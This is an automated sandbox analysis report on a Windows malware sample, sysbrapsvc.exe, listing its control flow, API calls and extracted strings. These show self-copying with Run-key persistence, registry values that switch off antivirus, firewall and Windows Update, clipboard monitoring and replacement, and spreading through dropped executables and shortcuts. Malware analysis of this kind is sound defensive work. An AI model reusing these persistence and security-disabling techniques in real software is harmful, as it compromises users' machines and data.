5634->5637 5635->5633 5635->5634 5636->5633 5636->5635 5637->5624 5638 40d9d0 5641 401200 5638->5641 5640 40d9f2 5642 40121d 5641->5642 5656 401314 5641->5656 5643 40a450 _invalid_parameter 7 API calls 5642->5643 5642->5656 5644 401247 memcpy htons 5643->5644 5645 4012ed 5644->5645 5646 401297 sendto 5644->5646 5649 40a660 _invalid_parameter 3 API calls 5645->5649 5647 4012b6 InterlockedExchangeAdd 5646->5647 5648 4012e9 5646->5648 5647->5646 5650 4012cc 5647->5650 5648->5645 5651 40130a 5648->5651 5652 4012fc 5649->5652 5653 40a660 _invalid_parameter 3 API calls 5650->5653 5654 40a660 _invalid_parameter 3 API calls 5651->5654 5652->5640 5655 4012db 5653->5655 5654->5656 5655->5640 5656->5640 5845 405910 GetWindowLongW 5846 405934 5845->5846 5847 405956 5845->5847 5848 405941 5846->5848 5849 4059c7 IsClipboardFormatAvailable 5846->5849 5850 4059a6 5847->5850 5851 40598e SetWindowLongW 5847->5851 5862 405951 5847->5862 5854 405964 SetClipboardViewer SetWindowLongW 5848->5854 5855 405947 5848->5855 5852 4059e3 IsClipboardFormatAvailable 5849->5852 5853 4059da 5849->5853 5857 4059ac SendMessageA 5850->5857 5850->5862 5851->5862 5852->5853 5858 4059f8 IsClipboardFormatAvailable 5852->5858 5860 405a15 OpenClipboard 5853->5860 5879 405adc 5853->5879 5856 405b44 DefWindowProcA 5854->5856 5859 405afd RegisterRawInputDevices ChangeClipboardChain 5855->5859 5855->5862 5857->5862 5858->5853 5859->5856 5863 405a25 GetClipboardData 5860->5863 5860->5879 5861 405ae5 SendMessageA 5861->5862 5862->5856 5863->5862 5864 405a3d GlobalLock 5863->5864 5864->5862 5865 405a55 5864->5865 5866 405a68 5865->5866 5867 405a89 5865->5867 5868 405a9e 5866->5868 5869 405a6e 5866->5869 5870 405630 13 API calls 5867->5870 5886 405750 5868->5886 5871 405a74 GlobalUnlock CloseClipboard 5869->5871 5880 405510 5869->5880 5870->5871 5875 405ac7 5871->5875 5871->5879 5894 4048a0 lstrlenW 5875->5894 5878 40a660 _invalid_parameter 3 API calls 5878->5879 5879->5861 5879->5862 5883 40551b 5880->5883 5881 
405521 lstrlenW 5881->5883 5885 405534 5881->5885 5882 40a450 _invalid_parameter 7 API calls 5882->5883 5883->5881 5883->5882 5884 405551 lstrcpynW 5883->5884 5883->5885 5884->5883 5884->5885 5885->5871 5891 40575d 5886->5891 5887 405763 lstrlenA 5887->5891 5892 405776 5887->5892 5888 4055d0 2 API calls 5888->5891 5889 40a450 _invalid_parameter 7 API calls 5889->5891 5891->5887 5891->5888 5891->5889 5891->5892 5893 40a660 _invalid_parameter 3 API calls 5891->5893 5931 405700 5891->5931 5892->5871 5893->5891 5903 4048d4 5894->5903 5895 404d5e StrStrW 5896 404d71 5895->5896 5897 404d75 StrStrW 5895->5897 5896->5897 5898 404d88 5897->5898 5899 404d8c StrStrW 5897->5899 5898->5899 5900 404d9f 5899->5900 5901 404ae2 5900->5901 5902 404e09 isalpha 5900->5902 5915 404e43 5900->5915 5901->5878 5902->5900 5904 404e20 isdigit 5902->5904 5903->5901 5905 404c69 StrStrW 5903->5905 5908 404af4 5903->5908 5904->5900 5904->5901 5906 404c94 StrStrW 5905->5906 5905->5908 5907 404cbf StrStrW 5906->5907 5906->5908 5907->5908 5908->5895 5908->5901 5909 405351 StrStrW 5913 405364 5909->5913 5914 40536b StrStrW 5909->5914 5910 405303 StrStrW 5911 405316 5910->5911 5912 40531d StrStrW 5910->5912 5911->5912 5916 405330 5912->5916 5917 405337 StrStrW 5912->5917 5913->5914 5918 405385 StrStrW 5914->5918 5919 40537e 5914->5919 5915->5909 5915->5910 5916->5917 5917->5909 5920 40534a 5917->5920 5921 405398 5918->5921 5922 40539f StrStrW 5918->5922 5919->5918 5920->5909 5921->5922 5923 4053b2 5922->5923 5924 4053b9 StrStrW 5922->5924 5923->5924 5925 4053cc lstrlenA 5924->5925 5925->5901 5927 405492 GlobalAlloc 5925->5927 5927->5901 5928 4054ad GlobalLock 5927->5928 5928->5901 5929 4054c0 memcpy GlobalUnlock OpenClipboard 5928->5929 5929->5901 5930 4054ed EmptyClipboard SetClipboardData CloseClipboard 5929->5930 5930->5901 5932 40570b 5931->5932 5933 405711 lstrlenA 5932->5933 5934 4055d0 2 API calls 5932->5934 5935 405744 5932->5935 5933->5932 5934->5932 5935->5891 5657 40e5d1 5659 40e5da 
5657->5659 5658 40e6cd 5659->5658 5660 40e643 lstrcmpiW 5659->5660 5661 40e6c3 SysFreeString 5660->5661 5662 40e656 5660->5662 5661->5658 5663 40e3c0 2 API calls 5662->5663 5665 40e664 5663->5665 5664 40e6b5 5664->5661 5665->5661 5665->5664 5666 40e693 lstrcmpiW 5665->5666 5667 40e6a5 5666->5667 5668 40e6ab SysFreeString 5666->5668 5667->5668 5668->5664 5669 40f354 5670 40f372 5669->5670 5671 40f408 5669->5671 5672 40f589 NtQueryVirtualMemory 5670->5672 5674 40f38d 5672->5674 5673 40f474 RtlUnwind 5673->5674 5674->5671 5674->5673 5936 405f1d 5937 405eb1 5936->5937 5938 405f1b 5937->5938 5942 405f06 memcpy 5937->5942 5939 40a660 _invalid_parameter 3 API calls 5938->5939 5940 405f28 LeaveCriticalSection 5939->5940 5942->5938 5675 40d0e0 5680 40d140 5675->5680 5678 40d10e 5679 40d140 send 5679->5678 5681 40d151 send 5680->5681 5682 40d16e 5681->5682 5683 40d0f3 5681->5683 5682->5681 5682->5683 5683->5678 5683->5679 5684 40d360 5687 40d364 5684->5687 5686 40d380 WaitForSingleObject 5686->5687 5689 40d3a5 5686->5689 5687->5686 5688 40cf80 208 API calls 5687->5688 5687->5689 5690 40b6b0 EnterCriticalSection 5687->5690 5688->5687 5691 40b6e7 LeaveCriticalSection 5690->5691 5692 40b6cf 5690->5692 5691->5687 5693 40c370 3 API calls 5692->5693 5694 40b6da 5693->5694 5694->5691 5943 40daa0 5949 401470 5943->5949 5945 40dab4 5946 40dadf 5945->5946 5947 40dac5 WaitForSingleObject 5945->5947 5948 401330 8 API calls 5947->5948 5948->5946 5950 401483 5949->5950 5951 401572 5949->5951 5950->5951 5952 40a240 7 API calls 5950->5952 5951->5945 5953 401498 CreateEventA socket 5952->5953 5954 4014d5 5953->5954 5955 4014cf 5953->5955 5954->5951 5957 4014e2 htons setsockopt bind 5954->5957 5956 401330 8 API calls 5955->5956 5956->5954 5958 401546 5957->5958 5959 401558 CreateThread 5957->5959 5960 401330 8 API calls 5958->5960 5959->5951 5962 401100 20 API calls _invalid_parameter 5959->5962 5961 40154c 5960->5961 5961->5945 5963 401920 GetTickCount WaitForSingleObject 5964 401ac9 
5963->5964 5965 40194d WSAWaitForMultipleEvents 5963->5965 5966 4019f0 GetTickCount 5965->5966 5967 40196a WSAEnumNetworkEvents 5965->5967 5968 401a43 GetTickCount 5966->5968 5969 401a05 EnterCriticalSection 5966->5969 5967->5966 5979 401983 5967->5979 5972 401ab5 WaitForSingleObject 5968->5972 5973 401a4e EnterCriticalSection 5968->5973 5970 401a16 5969->5970 5971 401a3a LeaveCriticalSection 5969->5971 5977 401a29 LeaveCriticalSection 5970->5977 6005 401820 5970->6005 5971->5972 5972->5964 5972->5965 5975 401aa1 LeaveCriticalSection GetTickCount 5973->5975 5976 401a5f InterlockedExchangeAdd 5973->5976 5974 401992 accept 5974->5966 5974->5979 5975->5972 6023 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5976->6023 5977->5972 5979->5966 5979->5974 5984 401cf0 7 API calls 5979->5984 5985 4022c0 5979->5985 5983 401a72 5983->5975 5983->5976 6024 40aff0 shutdown closesocket 5983->6024 5984->5966 5986 4022d2 EnterCriticalSection 5985->5986 5987 4022cd 5985->5987 5988 4022e7 5986->5988 5989 4022fd LeaveCriticalSection 5986->5989 5987->5979 5988->5989 5990 402308 5989->5990 5991 40230f 5989->5991 5990->5979 5992 40a240 7 API calls 5991->5992 5993 402319 5992->5993 5994 402326 getpeername CreateIoCompletionPort 5993->5994 5995 4023b8 5993->5995 5996 4023b2 5994->5996 5997 402366 5994->5997 6027 40aff0 shutdown closesocket 5995->6027 6001 40a660 _invalid_parameter 3 API calls 5996->6001 6025 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5997->6025 5999 4023c3 5999->5979 6001->5995 6002 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6026 4021e0 EnterCriticalSection LeaveCriticalSection 6002->6026 6004 4023ab 6004->5979 6006 40190f 6005->6006 6007 401830 6005->6007 6006->5971 6007->6006 6008 40183d InterlockedExchangeAdd 6007->6008 6008->6006 6014 401854 6008->6014 6009 401880 6010 401891 6009->6010 6037 40aff0 shutdown closesocket 6009->6037 6011 4018a7 InterlockedDecrement 6010->6011 6015 401901 6010->6015 6011->6015 6014->6006 6014->6009 
6028 4017a0 EnterCriticalSection 6014->6028 6016 402247 6015->6016 6017 402265 EnterCriticalSection 6015->6017 6016->5971 6018 40229c LeaveCriticalSection DeleteCriticalSection 6017->6018 6020 40227d 6017->6020 6019 40a660 _invalid_parameter 3 API calls 6018->6019 6019->6016 6021 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 6020->6021 6022 40229b 6020->6022 6021->6020 6022->6018 6023->5983 6024->5983 6025->6002 6026->6004 6027->5999 6029 401807 LeaveCriticalSection 6028->6029 6030 4017ba InterlockedExchangeAdd 6028->6030 6029->6014 6031 4017ca LeaveCriticalSection 6030->6031 6032 4017d9 6030->6032 6031->6014 6033 40a660 _invalid_parameter 3 API calls 6032->6033 6034 4017fe 6033->6034 6035 40a660 _invalid_parameter 3 API calls 6034->6035 6036 401804 6035->6036 6036->6029 6037->6010 5695 405fe5 5697 405f5e 5695->5697 5696 405fea LeaveCriticalSection 5697->5696 5698 40a6d0 8 API calls 5697->5698 5699 405fbc 5698->5699 5699->5696 6038 406ba6 6041 406b88 6038->6041 6039 406cc8 Sleep 6039->6041 6040 406bb9 6042 406260 4 API calls 6040->6042 6041->6039 6041->6040 6043 406cd8 ExitThread 6041->6043 6046 406340 4 API calls 6041->6046 6045 406bca 6042->6045 6044 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 6048 406c66 wsprintfW 6044->6048 6049 406c7b wsprintfW 6044->6049 6045->6044 6047 406beb 6045->6047 6046->6041 6048->6049 6050 406650 51 API calls 6049->6050 6050->6047 6051 40d3b0 6057 4021b0 6051->6057 6054 40d3ef 6055 40d3d5 WaitForSingleObject 6061 401600 6055->6061 6058 4021cf 6057->6058 6059 4021bb 6057->6059 6058->6054 6058->6055 6059->6058 6082 402020 6059->6082 6062 401737 6061->6062 6063 40160d 6061->6063 6062->6054 6063->6062 6064 401619 EnterCriticalSection 6063->6064 6065 401630 6064->6065 6066 4016b5 LeaveCriticalSection SetEvent 6064->6066 6065->6066 6071 401641 InterlockedDecrement 6065->6071 6073 40165a InterlockedExchangeAdd 6065->6073 6080 4016a0 InterlockedDecrement 6065->6080 6067 4016d0 6066->6067 6068 
4016e8 6066->6068 6069 4016d6 PostQueuedCompletionStatus 6067->6069 6070 40d780 11 API calls 6068->6070 6069->6068 6069->6069 6072 4016f3 6070->6072 6071->6065 6074 40d8c0 7 API calls 6072->6074 6073->6065 6075 40166d InterlockedIncrement 6073->6075 6076 4016fc CloseHandle CloseHandle WSACloseEvent 6074->6076 6077 401c50 4 API calls 6075->6077 6103 40aff0 shutdown closesocket 6076->6103 6077->6065 6079 401724 DeleteCriticalSection 6081 40a660 _invalid_parameter 3 API calls 6079->6081 6080->6065 6081->6062 6083 40a240 7 API calls 6082->6083 6084 40202b 6083->6084 6085 402038 GetSystemInfo InitializeCriticalSection CreateEventA 6084->6085 6086 4021a5 6084->6086 6087 402076 CreateIoCompletionPort 6085->6087 6088 40219f 6085->6088 6086->6058 6087->6088 6089 40208f 6087->6089 6090 401600 36 API calls 6088->6090 6091 40d5e0 8 API calls 6089->6091 6090->6086 6092 402094 6091->6092 6092->6088 6093 40209f WSASocketA 6092->6093 6093->6088 6094 4020bd setsockopt htons bind 6093->6094 6094->6088 6095 402126 listen 6094->6095 6095->6088 6096 40213a WSACreateEvent 6095->6096 6096->6088 6097 402147 WSAEventSelect 6096->6097 6097->6088 6098 402159 6097->6098 6099 40217f 6098->6099 6100 40d610 17 API calls 6098->6100 6101 40d610 17 API calls 6099->6101 6100->6098 6102 402194 6101->6102 6102->6058 6103->6079 5714 4074f1 ExitThread 5715 407ff9 5716 408002 5715->5716 5717 408011 34 API calls 5716->5717 5718 408e46 5716->5718 6116 40a73e 6117 40a660 _invalid_parameter 3 API calls 6116->6117 6120 40a6fd 6117->6120 6118 40a712 6119 40a450 _invalid_parameter 7 API calls 6119->6120 6120->6118 6120->6119 6121 40a714 memcpy 6120->6121 6121->6120

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 407500-407534 Sleep CreateMutexA GetLastError 1 407536-407538 ExitProcess 0->1 2 40753e-4075dd GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 4075e3-4075ee call 40ebe0 2->3 4 4078a9-4078d4 Sleep RegOpenKeyExW 2->4 14 4075f0-4075f2 ExitProcess 3->14 15 4075f8-407646 ExpandEnvironmentStringsW wsprintfW CopyFileW 3->15 5 407902-407922 RegOpenKeyExW 4->5 6 4078d6-4078fc RegSetValueExA RegCloseKey 4->6 8 407924-407950 RegSetValueExA RegCloseKey 5->8 9 407955-407975 RegOpenKeyExW 5->9 6->5 11 4079fa-407a1a RegOpenKeyExW 8->11 12 407977-4079a6 RegCreateKeyExW RegCloseKey 9->12 13 4079ac-4079cc RegOpenKeyExW 9->13 17 407a1c-407a48 RegSetValueExA RegCloseKey 11->17 18 407a4d-407a6d RegOpenKeyExW 11->18 12->13 13->11 16 4079ce-4079f4 RegSetValueExA RegCloseKey 13->16 19 40764c-40767b SetFileAttributesW RegOpenKeyExW 15->19 20 4076de-407720 Sleep wsprintfW CopyFileW 15->20 16->11 23 407b49-407b69 RegOpenKeyExW 17->23 24 407aa4-407ac4 RegOpenKeyExW 18->24 25 407a6f-407a9e RegCreateKeyExW RegCloseKey 18->25 19->20 26 40767d-4076b0 wcslen RegSetValueExW 19->26 21 407726-407755 SetFileAttributesW RegOpenKeyExW 20->21 22 4077b8-407811 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 20->22 21->22 29 407757-40778a wcslen RegSetValueExW 21->29 22->4 30 407817-407846 SetFileAttributesW RegOpenKeyExW 22->30 27 407b97-407bb7 RegOpenKeyExW 23->27 28 407b6b-407b91 RegSetValueExA RegCloseKey 23->28 31 407ac6-407af5 RegCreateKeyExW RegCloseKey 24->31 32 407afb-407b1b RegOpenKeyExW 24->32 25->24 26->20 33 4076b2-4076d4 RegCloseKey call 40ee30 26->33 34 407be5-407c05 RegOpenKeyExA 27->34 35 407bb9-407bdf RegSetValueExA RegCloseKey 27->35 28->27 29->22 36 40778c-4077ae RegCloseKey call 40ee30 29->36 30->4 37 407848-40787b wcslen RegSetValueExW 30->37 31->32 32->23 38 407b1d-407b43 RegSetValueExA RegCloseKey 32->38 33->20 45 4076d6-4076d8 
ExitProcess 33->45 40 407cf1-407d11 RegOpenKeyExA 34->40 41 407c0b-407ceb RegSetValueExA * 7 RegCloseKey 34->41 35->34 36->22 50 4077b0-4077b2 ExitProcess 36->50 37->4 43 40787d-40789f RegCloseKey call 40ee30 37->43 38->23 46 407d17-407df7 RegSetValueExA * 7 RegCloseKey 40->46 47 407dfd-407e12 Sleep call 40cc80 40->47 41->40 43->4 54 4078a1-4078a3 ExitProcess 43->54 46->47 55 407f87-407f90 47->55 56 407e18-407f84 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40daf0 call 406f70 CreateEventA call 40c3b0 call 40d5e0 call 40b770 call 40d610 * 4 call 40d780 call 40d8c0 47->56 56->55
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,b7x663937xa), ref: 0040751D
                                                                                • GetLastError.KERNEL32 ref: 00407529
                                                                                • ExitProcess.KERNEL32 ref: 00407538
                                                                                • GetModuleFileNameW.KERNEL32(00000000,0041AA40,00000105), ref: 00407572
                                                                                • PathFindFileNameW.SHLWAPI(0041AA40), ref: 0040757D
                                                                                • wsprintfW.USER32 ref: 0040759A
                                                                                • DeleteFileW.KERNEL32(?), ref: 004075AA
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                                                                • wcscmp.NTDLL ref: 004075D3
                                                                                • ExitProcess.KERNEL32 ref: 004075F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-2348032744
                                                                                • Opcode ID: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 406650-406665 _chkstk 84 406667-406669 83->84 85 40666e-406720 wsprintfW * 5 PathFileExistsW 83->85 86 406b48-406b4b 84->86 87 406722-406743 call 40ec20 85->87 88 406764-406773 PathFileExistsW 85->88 87->88 97 406745-40675e SetFileAttributesW DeleteFileW 87->97 89 406803-406812 PathFileExistsW 88->89 90 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 88->90 94 406814-40681a 89->94 95 406859-40687a FindFirstFileW 89->95 92 4067a9-4067ba CreateDirectoryW 90->92 93 4067cb-4067da PathFileExistsW 90->93 92->93 100 4067bc-4067c5 SetFileAttributesW 92->100 93->89 101 4067dc-4067f2 CopyFileW 93->101 102 406834-406847 call 406400 94->102 103 40681c-406832 call 406400 94->103 98 406880-406938 95->98 99 406b42 95->99 97->88 104 406942-406956 lstrcmpW 98->104 99->86 100->93 101->89 105 4067f4-4067fd SetFileAttributesW 101->105 112 40684a-406853 SetFileAttributesW 102->112 103->112 108 406958-40696c lstrcmpW 104->108 109 40696e 104->109 105->89 108->109 113 406973-406984 108->113 114 406b19-406b2f FindNextFileW 109->114 112->95 115 406995-40699c 113->115 114->104 116 406b35-406b3c FindClose 114->116 117 4069ca-4069d3 115->117 118 40699e-4069bb lstrcmpiW 115->118 116->99 121 4069d5 117->121 122 4069da-4069eb 117->122 119 4069bd 118->119 120 4069bf-4069c6 118->120 119->115 120->117 121->114 124 4069fc-406a03 122->124 125 406a73-406a7c 124->125 126 406a05-406a22 PathMatchSpecW 124->126 129 406a83-406a92 PathFileExistsW 125->129 130 406a7e 125->130 127 406a24 126->127 128 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 126->128 127->124 128->125 132 406a94 129->132 133 406a99-406ae9 wsprintfW * 2 129->133 130->114 132->114 134 406b03-406b13 MoveFileExW 133->134 135 406aeb-406b01 call 406510 133->135 134->114 135->114
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59

                                                                                Control-flow Graph

                                                                                control_flow_graph 688 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 689 406565-406579 lstrcmpW 688->689 690 40663f-406642 688->690 691 406591 689->691 692 40657b-40658f lstrcmpW 689->692 694 40660c-406622 FindNextFileW 691->694 692->691 693 406593-4065dc wsprintfW * 2 692->693 695 4065f6-406606 MoveFileExW 693->695 696 4065de-4065f4 call 406510 693->696 694->689 697 406628-406639 FindClose RemoveDirectoryW 694->697 695->694 696->694 697->690
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
                                                                                APIs
